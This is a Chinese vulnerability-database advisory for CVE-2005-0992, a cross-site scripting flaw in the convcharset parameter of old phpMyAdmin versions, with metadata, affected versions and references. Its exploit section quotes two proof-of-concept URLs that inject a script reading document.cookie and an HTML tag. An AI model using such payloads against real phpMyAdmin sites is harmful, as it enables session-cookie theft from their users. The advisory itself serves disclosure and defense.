PHPMyAdmin Convcharset 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108606 漏洞类型 跨站脚本
发布时间 2005-04-03 更新时间 2007-01-12
CVE编号 CVE-2005-0992 CNNVD-ID CNNVD-200505-487
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/25330
https://www.securityfocus.com/bid/12982
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-487
|漏洞详情
phpMyAdmin2.6.2-rc1之前版本的index.php中存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助convcharset参数注入任意的Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/12982/info

phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the 'convcharset' parameter.

phpMyAdmin versions prior to 2.6.2-rc1 are affected by this issue. 

http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>

http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>
|受影响的产品
phpMyAdmin phpMyAdmin 2.6.1 pl3 phpMyAdmin phpMyAdmin 2.6.1 pl1 phpMyAdmin phpMyAdmin 2.6.1 -rc1 phpMyAdmin phpMyAdmin 2.6.1 phpMyAdmin phpMyAdmin 2.6 .0pl3 phpMyAdmin phpMyA
|参考资料

来源:XF
名称:phpmyadmin-convcharset-xss(19940)
链接:http://xforce.iss.net/xforce/xfdb/19940
来源:BID
名称:12982
链接:http://www.securityfocus.com/bid/12982
来源:GENTOO
名称:GLSA-200504-08
链接:http://www.gentoo.org/security/en/glsa/glsa-200504-08.xml
来源:www.phpmyadmin.net
链接:http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-3
来源:MISC
链接:http://www.arrelnet.com/advisories/adv20050403.html
来源:SECUNIA
名称:14799
链接:http://secunia.com/advisories/14799
来源:BUGTRAQ
名称:20050404phpMyAdminCross-siteScriptingVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111264361622660&w=2